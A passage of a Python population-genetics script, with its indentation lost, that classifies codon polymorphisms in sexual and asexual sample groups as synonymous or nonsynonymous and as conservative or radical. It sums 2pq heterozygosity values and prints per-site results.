aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
sex_synS += 2
sex_sum2PQ_S += (2*twoPQ)
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\n')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
i += 1
sex_sum2PQ_S = str(sex_sum2PQ_S)
sex_sum2PQ_N = str(sex_sum2PQ_N)
sex_sum2PQ_C1 = str(sex_sum2PQ_C1)
sex_sum2PQ_C2 = str(sex_sum2PQ_C2)
sex_sum2PQ_C3 = str(sex_sum2PQ_C3)
sex_sum2PQ_C4 = str(sex_sum2PQ_C4)
sex_sum2PQ_C5 = str(sex_sum2PQ_C5)
sex_sum2PQ_C6 = str(sex_sum2PQ_C6)
sex_sum2PQ_C7 = str(sex_sum2PQ_C7)
sex_sum2PQ_R1 = str(sex_sum2PQ_R1)
sex_sum2PQ_R2 = str(sex_sum2PQ_R2)
sex_sum2PQ_R3 = str(sex_sum2PQ_R3)
sex_sum2PQ_R4 = str(sex_sum2PQ_R4)
sex_sum2PQ_R5 = str(sex_sum2PQ_R5)
sex_sum2PQ_R6 = str(sex_sum2PQ_R6)
sex_sum2PQ_R7 = str(sex_sum2PQ_R7)
sex_sum2PQ_meanC = str(sex_sum2PQ_meanC)
sex_sum2PQ_meanR = str(sex_sum2PQ_meanR)
sex_synS = str(sex_synS)
sex_nsynS = str(sex_nsynS)
sex_con1S = str(sex_con1S)
sex_con2S = str(sex_con2S)
sex_con3S = str(sex_con3S)
sex_con4S = str(sex_con4S)
sex_con5S = str(sex_con5S)
sex_con6S = str(sex_con6S)
sex_con7S = str(sex_con7S)
sex_meanConS = str(sex_meanConS)
sex_rad1S = str(sex_rad1S)
sex_rad2S = str(sex_rad2S)
sex_rad3S = str(sex_rad3S)
sex_rad4S = str(sex_rad4S)
sex_rad5S = str(sex_rad5S)
sex_rad6S = str(sex_rad6S)
sex_rad7S = str(sex_rad7S)
sex_meanRadS = str(sex_meanRadS)
asex_sum2PQ_S = 0
asex_sum2PQ_N = 0
asex_sum2PQ_C1 = 0
asex_sum2PQ_C2 = 0
asex_sum2PQ_C3 = 0
asex_sum2PQ_C4 = 0
asex_sum2PQ_C5 = 0
asex_sum2PQ_C6 = 0
asex_sum2PQ_C7 = 0
asex_sum2PQ_R1 = 0
asex_sum2PQ_R2 = 0
asex_sum2PQ_R3 = 0
asex_sum2PQ_R4 = 0
asex_sum2PQ_R5 = 0
asex_sum2PQ_R6 = 0
asex_sum2PQ_R7 = 0
asex_sum2PQ_meanC = 0
asex_sum2PQ_meanR = 0
asex_synS = 0
asex_nsynS = 0
asex_con1S = 0
asex_con2S = 0
asex_con3S = 0
asex_con4S = 0
asex_con5S = 0
asex_con6S = 0
asex_con7S = 0
asex_meanConS = 0
asex_rad1S = 0
asex_rad2S = 0
asex_rad3S = 0
asex_rad4S = 0
asex_rad5S = 0
asex_rad6S = 0
asex_rad7S = 0
asex_meanRadS = 0
logfile.write('Asex polymorphisms\n')
sys.stdout.write('\n\nAsex Polymorphisms\nGene\tSite\tCodon\tAlleles\tAAs\tPol/Div\tMutation Type\t1\t2\t3\t4\t5\t6\t7\tC/R Index\t2*pq\n')
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
asex_synS += 1
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
asex_nsynS += 1
asex_sum2PQ_N += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ) + '\n')
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
